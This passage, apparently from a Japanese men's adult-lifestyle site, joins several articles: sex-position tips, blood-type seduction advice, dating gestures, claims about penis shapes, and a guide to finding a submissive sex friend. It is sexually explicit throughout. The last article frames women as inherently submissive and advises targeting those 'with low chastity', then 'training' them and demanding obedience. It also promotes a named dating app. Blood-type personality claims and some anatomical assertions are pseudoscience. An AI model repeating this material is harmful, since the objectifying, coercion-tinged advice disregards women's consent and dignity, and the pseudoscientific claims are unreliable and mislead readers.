ペニスでGスポット、指でクリトリス、2つの性感帯を同時に刺激すると、女性はかなりイキやすくなるそうです。

クリトリスを刺激する際、激しく擦ると痛みを感じてしまいます。

優しくゆっくり刺激するようにしてください。

うつ伏せで挿入する


女性をうつ伏せにさせた状態で、男性が後ろから挿入する方法です。

いわゆる寝バックと呼ばれる体位になります。

奥までの挿入はできませんが、Gスポットを刺激できるので、女性をイカせやすいです。

浅めの挿入なので、大きく腰を動かしてしまうと、ペニスが抜けてしまいます。

腰の振り幅は小さくして、ピストン運動をするようにすると、ペニスが抜けにくくなりますよ。

挿入しながら、クリトリスを刺激したいときは、この体勢になるとやりやすいです。

また、お互いの身体がピッタリと密着するので、バックの中でも寝バックを好む女性が多い傾向にあります。

さらに、「四つん這いになるのが恥ずかしい。」という女性も少なくありません。

そんなとき、うつ伏せの姿勢で挿入するのも良いのではないでしょうか。

女性の上体をおこす

バックで挿入したあと、女性の両腕を引っ張って上半身をおこします。

すると深い挿入ができるだけでなく、ペニスを膣の上部に密着させることができます。

効率よくGスポットが刺激され、女性の感度もグッと高まりイキやすくなります。

ただ、男性も女性もツライ体勢になるので、長時間のプレイは厳しいでしょう。

バランスがとりにくい体勢なので、初めは片手だけ引っ張り、慣れたら両腕を引っ張るほうが良いかもしれません。

立った状態で挿入する


女性には壁などに手をついてもらい、お互い立った状態で後ろから挿入する方法になります。

いわゆる立ちバックです。

深い挿入ではなく、浅い挿入になるのでGスポットを狙いやすく、女性をイカせることが可能です。

また奥まで入らない体勢なので、女性は痛みを感じにくくなっています。

挿入したあとは、膣の上部に沿ってピストンしてください。

日本人の女性の多くは、膣が背中側に寄っていると言われています。

立ちバックは背中側を刺激するのに効果的なので、快感を得やすいんだとか。

また、この体位は狭い場所でのプレイも可能なので、お風呂場やトイレなどいつもと違う場所でのプレイで女性の興奮を高めるのも良いでしょう。

優しく愛撫をする

女性はSEXに性的刺激だけではなく、精神的快感も求めています。

そのためどちらも満たしてあげることで、女性の興奮は絶頂を迎え、イカせることができるのです。

精神的な快感を満たすためには、愛撫が重要となります。

挿入しながら、優しく胸や背中、首筋などを愛撫してみてください。

上体を起こして優しくキスをしてあげるのも良いでしょう。

丁寧な手の動きは、女性にしっかり伝わります。

その結果、女性の興奮を高めることができ、イカせやすくなります。

バックで挿入する際の注意点

いきなり激しく動かさない


バックでの挿入は、正常位よりも奥まで突くことができる体位です。

挿入してすぐ激しく腰を動かしたい気持ちもわかりますが、まずはゆっくりと動かしてください。

いきなり激しく突いてしまうと、女性は痛みを感じてしまうことがあります。

また、いきなり激しく動く自分本位の男性に対して「この人は、自分が気持ちよければいいんだ。」「私のことなんて、何も考えていない。」「これじゃあ、自己中プレイじゃん。」などの不快感を与えてしまう可能性があります。

そうなると、イクどころかSEXに対する熱も一気に冷めてしまいます。

初めはゆっくりと動かして、女性の反応をみてください。

女性に痛がる様子がない、感じている様子が見られるようであれば、腰を動かす速度を徐々に早めても大丈夫です。

コミュニケーションをしっかりとる

バックの体勢は、相手の表情や動きが見えません。

そのため女性は「私、本当に愛されているんだよね。」「次は何をするんだろう。」など、精神的な不安を感じやすい体位でもあります。

顔や仕草が見えないからこそ、女性に対してのコミュニケーションが重要なポイントになります。

痛くない?」「大丈夫?」「好きだよ。」などの言葉を、耳元でささやいたり、優しく丁寧なボディータッチなどのコミュニケーションをたくさんしましょう。

すると女性は安心感や「私大切にされてる。
といった幸福感も得られます。

このように精神的な不安を取り除いてあげることで、感じやすい体になり、イキやすくなりますよ。

まとめ

女性でもバックが好きな人は少なくありません。

ですが自分本位に動いてしまっては、バックでのプレイを拒まれてしまう可能性があります。

バックで女性をイカせるためには、挿入しながら様々な部位の愛撫やその女性が感じやすい角度を見つけることがポイントです。

パートナーをバックでイカせたいと思っている人は、是非参考にしてみてください。

O型女性の口説き方まとめ

「自分と同じO型の女性と付き合いたい」

「O型の女性は気があうから付き合ったら上手くいいきそう」

そんなO型の女性をターゲットにし、恋愛がしたいという男性いらっしゃいますよね?

O型の女性を口説くにあたって、O型女性の恋愛傾向やO型にありがちな特徴などを理解し把握することで意中の相手との恋愛をステップアップさせることは簡単になり、自分のものにすることができるんです。

そこで今回はO型女性の恋愛傾向、特徴とそれを踏まえた上での口説き方を紹介して行きたいと思います。

O型女性の恋愛傾向


・寂しがりやな事が多く会う頻度は多め

・相手への嫉妬心は比較的高く、一度信用を無くしたらアウト

・束縛や自由を奪われることを嫌う

・相手の時間は自分に使って欲しいが、自分の時間は自分で使いたい

・大胆なところがある為、好きと分かれば猛アタックすることがある

・一度好きになるととことん愛し尽くすが、別れた場合はその正反対でとことん相手を嫌う

おおらかで寛容的な男性を好み、甘える恋愛をしたがる

・相手には連絡をこまめにさせたがるが、自分の場合は熱中している事があると後回しにする傾向がある

・常に向上心が高い為、努力は欠かさないのでマンネリを恐れる

・記念日等にこだわりのない女性が比較的多い

・友達のようにふざけあえる相手が好き

・白黒はっきりさせないと嫌なので、二人の間に問題があった場合即解決をしたがる

O型女性にありがちな特徴


・部屋の片付けや整理整頓が苦手

・めんどくさいことは多少後回しにする

・サバサバした性格の女性が多く、男勝りなタイプが多い

・1日の中で一人の時間を必ず作る

・興味のある事は熱中し集中するが、興味のない事はなるべく避ける

・一つのことを継続して続ける事を好む為、貯金が好きなタイプが比較的多い

・褒められる事を好む為、褒められるとトコトン頑張り更に褒めてもらおうと努力をする

・常にポジティブな考えを持っている為ネガティブな思考の相手とは上手くいかない

・好き嫌いがはっきりしているため、交友関係は狭く深くを好む

・同時に複数のことをやるのは不得意

家族や友人を大事にする

・感情的なタイプが多く、喜怒哀楽の表現がやや激しい

・周りを見る力は長けているが、自分の事になると疎い

総合的なO型の女性

これらの恋愛傾向や特徴からわかるO型女性の大きな特徴は、自分に甘く相手に厳しい事が多い点です。

「自分の時間は極力作りたいが相手には相手の時間を全て使って欲しい」と内心思っていたり、「甘えるのが大好きなので相手には甘やかして欲しい」等これらはO型女性の口からよく耳にする情報です。

ここだけを見れば男性はワガママだと思う方もいますが、最低限一人の時間を作ってあげたり甘えさせてあげる事で彼女たちは満足する為、大きなワガママを常に言うわけではありません。

むしろ生活面では相手の面倒を見てあげるのが好きな女性が多く、お世話をする事に喜びを得ている為なにかをしてもらう事の方が多いとのこと。

口説くまでの3ステップ


O型女性を口説く時に「どうやって口説いたら彼女たちをオトせるの?」と思った悩める男性たちにO型女性を口説く為のポイントを紹介していきたいと思います。

こまめに連絡を取ろう

これは近づく為の大きな一歩です。

「こまめにって何を送ればいいの?」と思う方少なくないと思いますが、長文のメッセージは送る必要はありません。

なぜならばこまめに連絡を取る人間に長文を好まない傾向がある為です。

おはようの挨拶からおやすみの挨拶まで、たった一言たった一行でも彼女たちは喜びますし、それと同時に彼女たちは報告を好む為、「今◯◯にいるよ。」「今◯◯しているんだ。」などのメッセージも有効です。

自分へ逐一報告をしてくれる事に「信頼を置いてくれている」と思う女性が多いのもわかりましたが、彼女たちが今なにをしているのか聞くのもかなり重要だという事がわかりました。

これは相手に「私はあなたに興味があります」と意思表示している事になるからです。

自分の話ばかりしていると、女性はうんざりしてしまう事も多いのでちゃんと相手の話を聞いてあげることも大事になってきます。

ここで一つ大事なポイント

連絡を取り合う段階で、相手の趣味を聞き把握しておくことで次のステップに活かすことが出来ます。

デートに誘おう

O型の女性は大胆な性格で、相手にも求めてしまう傾向があります。

デートに誘うのは勇気のいることですが、いつまでも先延ばしにしてしまうと彼女の興味が薄れていってしまうので、あまり時間をかけずに「気軽」にデートに誘う事が最も重要です。

「口説く為のデート」というよりは「親密度をアップさせる為のデート」と考えてください。

さすがのO型女性も間髪開けずにすぐ口説かれたら、不信感を持ち抱いてた好意もどこかへ行ってしまうかもしれません。

それだけは絶対に避けなければいけないので「好感度をあげる為のデート」をします。

ここで出てくるのが予めサーチしておいた彼女の趣味です。

趣味にあったデートをしてあげるのはとても重要なことです。

分かりやすく説明すると、動物が好きなら動物園や今話題の猫カフェやフクロウカフェ。

映画が好きなら映画館ですし、ファッションが好きならショッピングに付き合うもよし。

こういったようにそれぞれにあったデートを企画する事が大事です。

ここでデートをする時に一番大事なこと

彼女が好きな趣味嗜好のデートをしているからといって、自分も楽しむことを忘れない

「相手に自分の趣味嗜好を理解し興味を示して欲しい」というのはO型女性に限らず全ての女性に共通することです。

せっかくのデート、相手がつまんなそうにしていたり上の空だったら嫌ですよね?

自分が嫌なことは相手にはしないよう極力注意していきましょう。

こうしたデートをいつもしなければいけない訳ではなく、今度は「◯◯に行きたいんだけど付き合ってくれない?」と自分の趣味嗜好の場所へフランクに誘ってみましょう。

多くの女性がYESと言うでしょう。

何故ならばここで多くの女性は、「自分の好きな場所に連れて行ってもらっているので断りづらい」という心理と、「相手の趣味嗜好ものぞいてみたい」という好奇心が沸くからです。

これでまたデートをする口実にもなりますし、自分の趣味を知ってもらい自分に合ったデートも出来ちゃうって訳です。

とびきりのシチュエーションで実際に口説く


まずシチュエーションですが、O型女性はロマンチストが多くそういった演出に弱い傾向にあります。

大げさでロマンチックなデートは苦手という女性も増えている中、今でも尚ロマンチストがとても多いので綺麗な景色の見える場所少し敷居の高いレストラン等演出は万全にして今までのデートとのギャップを作ることが大事です。

ギャップを作り、少し緊張した空間を作ることで自分の真剣な想いも相手に伝わりやすいと思いますが、いきなりそんな所へいって口説くのは恥ずかしいという方もいらっしゃいますよね?

そんな時は「今日はちょっと気合いをいれちゃった!」と少しふざけても吉です。

これで自分はもちろん相手の緊張もほぐれるでしょう。

O型女性の恋愛傾向にも記述してある通り、「友人のようにふざけあえる相手が好き」な傾向にあるので、そこまでかしこまる必要はないのと、これまでのステップを踏んだ上でそこまでの関係が築き上がっているからです。

一番大事な口説き方ですが真剣に、はっきりと気持ちを伝えるのが上手くいくポイントです。

いざ口説く時に「◯◯ちゃんと出会ってから…」と思い出を辿っていくスタイルも良いですが、あまり長いと口説かれている事をすでに察している場合、口説かれているとわかっているのに核心に突かれない事に不満を抱く方もいるからです。

ここで大げさな例えを用いるのは効果絶大です。

例えば「こんなに好きになった人はいない」「こんなに趣味の合う相手に出会ったことがない」などの言葉です。

O型の女性は自分が感情的なので、相手からあまり感情が伝わってこないとピンとこない場合があります。

「またまた〜」と受け流されてしまう場合もありますが、これは効果がない場合の受け流しではないことを頭に入れておくことが大事、照れ隠しの場合が最も多いです。

しっかりと自分の思いを伝え、彼女になって欲しいという意思を伝えるのが大事なのですが、この時しっかりと相手のことを見て伝えましょう。

まとめ

O型の女性はロマンチックな場所で口説くのが一番効果がありそうですね。

今までのポイントや重要な箇所を理解した上でこの段階までこれたのなら、ゴールは確実といってもいいでしょう。

なによりも自分の気持ちは言葉や行動に表して表現していくことが恋愛をしていく上で何よりも重要であり、相手の事を考えいかに相手を楽しませ自分も楽しむかということなんです。

以上を踏まえて、あなたもO型女性を完全攻略してみてはいかがですか?

女性が思わず胸キュンしてしまう6つの瞬間

意中の女性や大好きな彼女とデートをする時、普通のデートよりも自分への好感度をあげもっと自分に夢中にさせるデートをしたいと思いませんか?

デートをする際、少し工夫するだけで相手の心を掴みキュンキュンさせることが可能であり、それが恋愛をうまくいかせる大事なポイントにもなってくるんです。

そこで今回はそんな女性が胸キュンする6つの瞬間を紹介していきたいと思います。

車がバックする時に助手席に手をもたれかける


手始めに、最もベターで女性をキュンキュンさせる魔法のアクションです。

なぜ胸がキュンキュンするのか、それはなんといっても距離感にあります。

これはキスをするときとは全くちがう距離の感じ方とも言えるんです。

なぜなら、キスの場合段階をふんだ上で近づくとわかっているので「近づく」という行為よりもどちらかといえば「キス」という行為にドキドキしますよね?

その点車がバックする時に助手席で手をもたれかける行為は「想定外」で起きるプチハプニングだからです。

この時に胸キュンしたことで相手を意識するようになったという女性が多い事も今回分かったのと、友達から恋愛対象へ変わるという瞬間になる場合がとても多いようです。

あの狭い空間に二人でいるという事は相手に嫌われてる事はほとんどないと思うので、皆さんもぜひやってみてはいかがですか?

車道側にならないよう誘導してくれる


こちらは男性から女性に対する気遣いを感じられる胸キュンの瞬間です。

本能的にこの行為をする方がたまにいらっしゃいますが、確実にモテていますしそういう方は常日頃、気配りや気遣いが丁寧な所が多いです。

2パターンの誘導の仕方


実はこちらの胸キュンポイント、二通りの誘導の仕方があります。

「危ないからこっちおいでと言って誘導する」

女性は「おいで」という言葉に敏感であり、トキメいてしまう傾向にあるようでそこで大事なのはそっと肩や腕をつかみ歩道側に誘導してあげることです。

露骨にベタベタさわるのは逆効果なので注意してください。

「話してる最中に無言で誘導する」

一見何も言わないので不愛想に思われがちですが、例えば話の最中「へぇ~そうなんだ~!」と相槌をしている時等にそっと腕をつかんで誘導するというものです。

「なぜ無言なのに胸キュンするの?」と思った方もいらっしゃいますよね。

それは会話をしながらの『スマートな誘導』にトキメいているからであり、自然に出来なければ少しかっこ悪いので、少しだけ上級編です。

まずは口頭で言ってあげるというパターンからやっていくといいと思います。

エレベーターから降りる際に、ドアを押さえ最後に出る

「お先にどうぞ」と先に降りる事を譲ってあげるとポイントアップ。

これは異性関係なく出来ている人を見ると素敵だなぁと感じる方も多いと思いますし、こういう些細な事にも気を配れるという姿勢に女性は胸キュンするそうです。

これと同時に、同乗者に行先フロアを聞いてあげるというものもあります。

これは自分より後に入ってきた方へ「何階ですか?」と一言いうだけなので、こちらも割と実践しやすいですが「話しかけるのがちょっと苦手・・・」という方は降りる際ドアを押さえてあげるだけでも違います。

お礼を言われたら喋らずとも会釈をする程度ですみますし、実践していきたいですね!

重い荷物を持ってくれようとする時


まず先に言っておくのが、必ずしも荷物を持つ行為に胸キュンしているわけではなく自分の事を気にかけてくれているという行為に胸キュンしやすい傾向にあるようです。

「荷物重くない?大丈夫?」の一言で女性から男性への印象はグーンとアップします。

実際に聞いた時、素直に甘え持ってほしいと言われた場合更に好感度アップする魔法の言葉があるんです。

それは「重いのによく持ってたね。気づくのが遅れてごめん。」という優しい声掛け。

女性は「全然そんなことない、むしろ持ってくれてありがとう。」と感謝の気持ちもアップします。

もし荷物を持つのを断られた場合は、しつこく荷物を持ちたがるよりも「そっか、重くて持ってほしい時は素直にいうんだよ」と優しく声を掛けてあげるととても良いですしどちらも優しい声掛けで胸キュンに続き好感度アップも狙えます。

子供、動物にいつもとは違う面が見えた時

これは、子供や動物に対して接するにあたっていつもとは違う優しい語り掛けをした際のことを指しているそうです。

赤ちゃん言葉とまでオーバーにいくと逆に引かれてしまうかもしれないので要注意。

例えば小さな子供に対し「今何歳なの~?」と語尾を伸ばして話したり、子供と無邪気に遊んだりと普段の男性とのギャップに胸キュンする女性がとても多い事がわかりました。

子供や動物に優しい人はもちろん好かれますし、普段とのギャップがあるとなると胸キュンも倍増するそうです。

ここでプチ情報!あまり子供に話すような口調で喋る事はないですが、老人に優しい人も好感度はアップするんです。

例えば老人に道を尋ねられた時に優しく教えてあげてる姿をみて胸キュンしたという意見も世の中にはかなり多く老若男女問わず人に優しい人は女性のみならず万人に好印象を与えることもできます。

女性の細かな変化に気づいてくれた時


よく「髪型を変えたのに気付いてくれない」という意見を耳にしますよね?

これに対し「前髪を少し切った位じゃわからない」という意見もセットで耳にします。

実際どうなのかリサーチした所、「前髪を少し切った位で気づかないと文句を言うことはない」との意見が多かったです。

周りやネットの情報だと少しの変化に気づかないというシーンを想像してしまいがちですが、実際の所大きな変化の場合に気づいてくれればいいという意見がとても多く見受けられました。

髪の毛を切ったり、パーマをかけたりそんな場面に出くわした場合「あれ?髪型変えた?雰囲気が変わって素敵だね」と褒めてあげることが重要になってきます。

女性の場合、オシャレをして身だしなみを整える際多くの人が周りからの印象を良くするために行う場合が多いです。

仕事の為に身なりを整えるのも、相手に不快感を与えない為であり自分よりも周りの事を気にしていますが、恋愛になると好きな人の為に可愛くなりたいと女性は思うので、その為に自分の時間を使い美容室にいき髪型を整えたり、少しでも「可愛い、素敵だな」と思ってもらえるようメイクを頑張るとのことです。

なので言うならば自分のためにしてくれている訳ですので、気づいて欲しいというのが女性の本音なのです。

気づいてくれた際に「あっこの人私のこと見てくれてるんだ」とキュンキュンするそうなのですが、ここで見落としがちな女性の変化ポイントを特別にご紹介します。

女性が褒められて嬉しかったが中々相手に褒められないポイントが『爪』です。

指先は中々目がいかないようで、褒められたという女性は思った以上に少なかった上に褒められた女性は「こんな細かい所までみてくれてるんだなぁ」とキュンキュンしたそうです。

爪といっても男性はネイルアートの知識が全くと言って無いと思いますし「どう褒めたらいいかわからない」という方がほとんどだと思います。

そういう場合はこう言いましょう。

「いつも爪先まで気を遣っていて素敵だね」です。

ネイルアートを具体的に褒めなくても爪まで見てもらっているという事実は受け取れます。

それとなく自然に会話の最中にでも目線を爪に切り替え、褒めてあげてはいかがでしょうか?

まとめ

ここまで6つの胸キュンする瞬間をご紹介してきましたが、全体的に相手に気遣ったり思いやる瞬間に惹かれる傾向にあるようですね。

相手を思いやり言葉や行動にする事で自分のことを大事に考えてくれているという事も伝わりますし、ふとしたときにくる胸キュンには恋を加速させる効果があるので、実践して相手を虜にさせ自分の恋愛を有利に進める事ができます。

以上を踏まえ、意中の女性又はパートナーの女性をキュンキュンさせてみてはいかがでしょうか?

女性が感じやすくイキやすい7つのぺニスの特徴

女性も男性と同じで、人それぞれ感じる部分がちがい、イキ方や感度も違ってきます。

女性をより快感に導きたい、もっと欲しがってほしいと思う男性は多いのではないでしょうか?

セックスを最高に楽しむためのぺニスの特徴をいくつかご紹介します。

太さのあるぺニス



セックス中に膣内いっぱいにぺニスを感じる事が出来るため、膣全体を男性に支配されているという気持ちになるのです。

Mっ気のある女性は、太いぺニスを見るだけで「これが入ってくるなんて」と見ただけで興奮してしまいます。

また中には、フェラチオの時に「顎が痛くなりそう」と身構える女性も少なくありません。

立派な太めぺニスを活かすには、女性への気配りが大切になります。

例えば、フェラチオ中に「大丈夫?痛い?」等と声をかけながら愛撫する事で、女性はフェラチオを強要しないと安心出来るのではないでしょうか。

また、ぺニスの特徴を活かすには激しいピストンだけではありません

膣内から圧迫され、小刻みに動く事によってクリトリスが擦れ女性は感じて何度もイってしまうようです。

膣の入り口から慣らすようにしながらゆっくりと小刻みにピストンしながら挿入する事がポイントになります。

カリが高いぺニス

多くの女性から感じやすいと大人気なぺニスの特徴です。

女性の膣内には沢山のビラビラがあり、そのヒダ一つ一つにカリがしっかり引掛り刺激されるため、快感度が大きいのでしょう。

そのため、少しのピストンで甘い吐息を漏らし始めます。

浅いトコロから少し深い部分まで感じやすい女性は、カリ高ぺニスで何度も絶頂してしまうのです。

このタイプのぺニスの特徴は、ヒダやGスポットを刺激しやすい正常位が最も適していて、女性を中イキさせやすいのです。

カリが気持ちイイ部分を刺激して、膣の内側からクリトリスにまで響くように膣壁をゴリゴリされる事で、たまらなく気持ちイイのだそうです。

ポイントは、時に激しく時にソフトにとリズミカルにピストン運動をする事で、何度でもGスポットを刺激してみましょう

硬いぺニス



男性は射精する時、硬ければ硬い程気持ちいいものですよね?

女性は、硬いぺニスを見たり触れたりすると「興奮してくれてるんだ」と嬉しくなると同時に興奮するのです。

女性の多くが単に硬いぺニスが良いというだけではないようで、自分に興奮してくれてるという喜びが挿入してからのエクスタシーに影響しているようです。

また「挿入感があって気持ちイイ」と感じる女性も多く、カチカチのぺニスが膣の入り口に当たるだけでも挿入後の感度やイキ方が上がります

硬いぺニスをフェラチオしたり手コキするだけでも女性は、感じています。

体も心も男性を感じているため、挿入してすぐに感じ始めます。

それは、男性に征服されていると感じるため、挿入直後から快感を覚えるからなのです。

曲がっているぺニス

大きさや長さが違うように、曲がり方も人それぞれです。

曲がっていると言っても角度は様々で、挿入角度が違うと、女性の膣内のどこに当たるかも違ってくるのです。

当たる場所によって、女性の感じ方も変わります

また、曲がり方によってはGスポットに当たり、潮吹きしてしまう女性も少なくありません。

女性の膣も形を様々に変えるため、セックスを何度も繰り返すうちにぺニス形にフィットしていき、感度が上がります

すると中イキしやすく、ポルチオを刺激されるので行為中何度もイってしまいます。

曲がり具合によって、体位を変えながらお互いの気持ち良くなれるポイントを探りながらすると良いでしょう。

長さのあるぺニス



ポルチオに当てて欲しいと女性が思っていても、他のタイプのぺニスだと、届かなかったり探し当てにくかったりするのです。

その点では、長めタイプのぺニスならではのテクニックが大活躍するのです。

しかし、長めタイプのぺニスでは、いざ射精する時のスピード感に物足りなさを感じてしまう事があるのではないでしょうか?

そんな時は、女性のポルチオに押し当てるようにしてフィニッシュを迎える事で、お互い言葉で表せない程の快感が味わえます。

女性の中には、痛みを言えずにガンガン突かれる事を我慢している人もいるので「もしかして、奥まで突かれるの嫌かな?」と気を配るとより良いセックスが出来るでしょう。

長いぺニスを活かして、膣の中をゆっくり押し当てるようにしたり、クリクリと掻き回してみて下さい。

ポルチオを刺激され、膣の中を掻き回される事で、女性から激しくぺニスを求められるでしょう。

反りがあるぺニス

太さや硬さはもちろんですが、女性はギンギンに反り上がっているぺニスを挿入されたいといつも思うものです。

上反りタイプのぺニスを見て、女性は興奮しているため、フェラ中も挿入される事を想像して感じてしまうでしょう。

上反りタイプのぺニスはGスポットに当たりやすく、トントンとリズミカルに突いたり、擦り当てる事で簡単に絶頂してしまいます。

反りがあるぺニスは、持久力さえあれば何度でも女性をイかせる事ができます。

また、下着の上からのもっこり感も女性の目を釘付けにさせ「入れて欲しい」と思わせる事が出来るようです。

清潔なぺニス



どのようなぺニスでも、女性が感じやすくイキやすい状態になるには、大きさや形はもちろん重要なことでしょう。

しかし、ぺニスが清潔である事が多くの女性が感じやすくなるポイントのようです。

いくら大好きな彼のぺニスでも、臭いや汚れがある事で、フェラチオに抵抗を感じてしまう女性も少なくありません。

セックスの時だけ綺麗にするのではなく、日頃から手入れをしている事で、「ねぇフェラして?」とセックスの時に女性に言いやすいのではないでしょうか?

女性も、清潔にされているぺニスをフェラチオする事で、挿入される前から早く欲しいと心から感じ、挿入されてからも身体は敏感に反応するのです。

女性器も同じで、清潔にされている事で男性も抵抗無くセックスを気持ち良くなれるでしょう。

まとめ

女性の多くが感じやすくイキやすい理由は、ぺニスを挿入される前から感じているようですね。

心から満たされる事で、悦びも大きいのでしょう。

女性を虜にして、欲しがるぺニスになる参考にしてみて下さい。

Mのセフレを作るためにすべき5つの方法

たいていの女の子は、「エッチは責められたい!」と望んでいます。

意識はしていないけど、心のどこかでMの気質を持っている女の子は多いですが、「エッチで縛られたい。激しく揉まれたり、舐められたい。」など相手からの言葉や行動の刺激を受けるのが好きな女の子はMだと言えます。

そういったMの女の子とアブノーマルなエッチをして、普通のエッチよりも快楽を味わいたいといった男性が増えてきています。

今回はMのセフレを作るためにすべき5つの方法を紹介したいと思います。

Mのセフレの条件を決める



理想のMのセフレとは、ひとそれぞれ違うと思いますが、自分でMのセフレが作りたいなら、どんな女の子がいいのか考えておくのがいいです。

誰でもいいというのでは、運よく出会えたとしてものちのち関係が続かないか、「ちょっと違うかも?」といった違和感もでるかもしれません。

これだけは自分にとって譲れない条件を書き出してみて、実際にMのセフレができた時のことをシュミレーションすることでより現実化していくことでしょう。

一般的なMのセフレの理想の条件5つ

1. 顔、年齢、スタイルが好みのタイプ

2. お金を要求してこない

3. 自分がしてみたいエッチプレイをしても嫌がらない

4. 口答えせず、従順である

5. 嫌になったらすぐ関係を終わらせても文句を言わない

他にも理想の条件はひとそれぞれ違うと思いますが、これだけは譲れないところ以外は妥協してMのセフレを探したほうがいいと思います。

顔に関しては、実際に会う前に写メを送ってもらって、確認するほうが自分の好みの顔かどうか会う前にチェックできるので、おススメです。

悪徳な出会い系アプリの登録はしない



評判が非常に悪い出会い系アプリで詐欺まがいのサイトは、「WAVE」です。

メッセージを1通送るだけで、230円もかかりますし、「WAVE」から送られてくる女性の画像を見るだけで、なんど210円もかかります。

画像を見ると、可愛い女性や美しい女性が多いですが、実際にいる女性ではなく全てサクラです。

「リミット解除」と言われる60分無料課金は、60分間適当に話をして終了でまたポイント購入を勧められるという超悪徳な課金方法です。

相手がサクラなので、会えることは100%ありませんので、出会い系アプリを利用するときは評判がよく、実際に会えるところに登録するのが一番いいです。

個人運営の募集掲示板の利用はやめる

個人の運営だと誰にでも登録できるため、会員の質は悪く、もし何らかのトラブルに巻き込まれた場合には運営者は何の責任もないため危険な目や大変なトラブルに見舞われることもあります。

個人情報の漏洩などの危険性もあるので、サイトに登録する際には、個人か会社かどうか見極めて登録をしましょう。

ハッピーメールに登録する



「Mのセフレを作れる」ことで一番評判がいいのが、「ハッピーメール」です。

まず、自分のプロフィールを充実させることがMのセフレと出会える第一歩です。

セフレの理想の条件に当てはまるように、自分の好みのタイプはきちんと記入することが大切です。

身長、体型、性格、顔など、細かく記載しておくことで、相手の女の子も「わたしに条件が当てはまるかも?」とアプローチがかかってきます。

また、顔写真は必ず乗せることがポイントとなってきます。

男性の顔がわかることで相手の女の子は安心感をもつようになり、出会えるチャンスは、何倍にもなりますから、「ハッピーメール」に写メを載せるのに抵抗があったとしても、Mのセフレを作るためには、写メを必ず載せてください。

ハッピーメールで毎日行ってもらいたいこと3つ

ハッピー日記を書くこと、1日5~10回ほどログインすること、好みの女の子に「いいね」を付けることです。

1つ目のハッピー日記を書くことは、業者とは間違われないためであり、日記友とも出会えるチャンスが増えます。

2つ目は、1日に何度もログインすることで、たくさんの女の子に見てもらえるという優先システムがあります。

毎回ログインするたびにパスワードと会員番号を入力するのは大変なので、「クイックログイン機能」を使えば、サイトにアクセスするだけですぐに利用できます。

3つ目は、いきなりメールを送ると相手の女の子も警戒してしまうので、メールを送る前に、「いいね」を付けて、相手の反応をみます。

「いいね」を付けた相手から、反応があれば出会えるチャンスはあるので、メールを送り、反応がない場合は、出会えるチャンスは少ないため、メールをしないことです。

反応してくれた女の子だけにメールを返すだけなので、ポイントの節約にもなります。

容姿に自信がなくても関係ない

ハッピーメールに登録しているMの女の子はノーマルなエッチには飽きてしまった、普通のエッチでは物足りないなど性経験が豊富な女の子もいます。

そういった女の子は、相手の男性の容姿、スタイル、性格、年収などは全く意味がないと感じているので、Mのセフレを作りたいなら、卑屈にはならずドンドン行くべきです。

Mの女の子は何を重視しているのかというと、「エッチをしての体の相性」だけです。

例えば、容姿に自信がない男性でも、Mの女の子にとっては、「わたしはこんな不細工な男に犯されている。虐められている。」とより一層自分を痛めつける感覚が増すので、逆に言えば、男性が自分の短所だと感じているところがMの女の子にとっては男性の最大の長所となっているのです。

ナンパをする



合コンで知り合った女の子とセフレになるには、いろんな制約がありうまくいかない場合が多いです。

セフレになったことを他の人に言いふらされたりする可能性もありますし、女の子がMでなく抵抗されて嫌な感じになるのも後味が悪いです。

その点、ナンパで出会う女の子はあと腐れがありません。

ナンパは、クラブや道で歩いている女の子に声をかけることから始め、カラオケに誘い、楽しく歌い、「今、セフレいる?」という流れに持っていくといいです。

声をかけるには貞操観念が低そうな女の子を選ぶと、成功率も高まります。

実際にセフレになってくれたら、もともと女性はM体質なので、本気なMにするためにあなたがいろいろと自分好みのMに調教していくのも楽しいでしょう。

まとめ

Mのセフレを作るためには、まずどんなセフレがいいのか自分なりの条件を決めておいてから、行動に移すほうが自分の理想にピッタリのMのセフレが作れます。

ハッピーメールは、条件にあった女の子を探しやすく、早く見つけることができるため自分のプロフィールを充実させ、相手の女の子のタイプをきちんと記載しておくことで、理想とするMのセフレを作れることができる優良な出会い系サイトなのでこれからの快楽的性活動に役立つと思われます。